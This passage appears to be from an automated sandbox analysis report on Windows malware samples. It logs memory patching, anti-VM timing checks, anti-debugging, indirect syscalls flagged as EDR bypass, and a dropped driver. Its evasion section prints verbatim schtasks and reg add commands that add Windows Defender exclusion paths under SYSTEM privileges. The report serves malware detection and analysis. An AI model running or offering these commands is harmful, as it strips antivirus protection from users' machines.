Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 5056 base: 77382F90 value: E9 7A D0 C4 89
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 720 base: D60005 value: E9 8B 2F 62 76
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 720 base: 77382F90 value: E9 7A D0 9D 89
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA4183C
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9EF34F
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C96BC04
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAE82C1
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA3F839
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA68647
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA4C0AF
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAF6565
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 3B4ED6D
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 3744BC8
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 379E627
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 377336B
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 37D97BB
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 37CA3BD
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 38554DC
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9C5143
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAC9F9E
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CABB056
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C26A03F
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C389F9E
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C283E38
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2AF34F
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C99F12B
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CB091B6
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C396E74
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C3B6565
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2FF839
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C3D8092
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C371EB4
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2690FC
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C3B2F48
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C1DDE34
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C268B19
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C27F34F
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2390FC
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2887AA
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C341EB4
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C382F48
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C22F12B
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C292089
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C1ADE34
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9C3E38
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9A90FC
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAF2F48
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeRDTSC instruction interceptor: First address: 140001113 second address: 14000112A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeRDTSC instruction interceptor: First address: 14000112A second address: 14000112A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FF9B8D55D60h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\EMp3o1.exeRDTSC instruction interceptor: First address: 3F1C255 second address: 3F1C263 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_42-3236
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_41-3230
Source: C:\Users\user\Documents\EMp3o1.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-14029
Source: C:\Users\user\Documents\EMp3o1.exeAPI coverage: 2.7 %
Source: C:\Users\user\Documents\EMp3o1.exe TID: 5840Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exe TID: 6628Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 2432Thread sleep time: -40000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 1908Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 2096Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 3184Thread sleep count: 43 > 30Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 5644Thread sleep count: 39 > 30Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 2096Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00007FFDAC08A1B8 FindFirstFileExW,5_2_00007FFDAC08A1B8
Source: C:\Users\user\Documents\EMp3o1.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: G5CQjd.exe, 00000028.00000003.3779906783.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Documents\EMp3o1.exeAPI call chain: ExitProcess graph end nodegraph_5-14030
Source: C:\Users\user\Documents\EMp3o1.exeAPI call chain: ExitProcess graph end nodegraph_5-14373
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00000001400073E0 LdrLoadDll,5_2_00000001400073E0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE00CD mov eax, dword ptr fs:[00000030h]40_3_04DE00CD
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE00CD mov eax, dword ptr fs:[00000030h]40_3_04DE00CD
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE0643 mov eax, dword ptr fs:[00000030h]40_3_04DE0643
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE0643 mov eax, dword ptr fs:[00000030h]40_3_04DE0643
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE00CD mov eax, dword ptr fs:[00000030h]40_3_04DE00CD
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE00CD mov eax, dword ptr fs:[00000030h]40_3_04DE00CD
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE0643 mov eax, dword ptr fs:[00000030h]40_3_04DE0643
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 40_3_04DE0643 mov eax, dword ptr fs:[00000030h]40_3_04DE0643
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,5_2_0000000140004630
Source: C:\Users\user\Documents\EMp3o1.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000001400106B0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,5_2_00000001400092E0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00007FFDAC082630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDAC082630
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00007FFDAC0876E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDAC0876E0
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00007FFDAC081F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFDAC081F50
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 41_2_00712AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_00712AE2
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 41_2_007110CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_007110CC
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 41_2_007151FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_007151FB
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCode function: 42_2_001F10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_001F10CC
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCode function: 42_2_001F2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_001F2AE2
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCode function: 42_2_001F51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_001F51FB

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\EMp3o1.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeNtDelayExecution: Indirect: 0x1F94E4Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeNtProtectVirtualMemory: Indirect: 0x2A4B253Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeNtProtectVirtualMemory: Indirect: 0x2A2B253Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeProcess created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
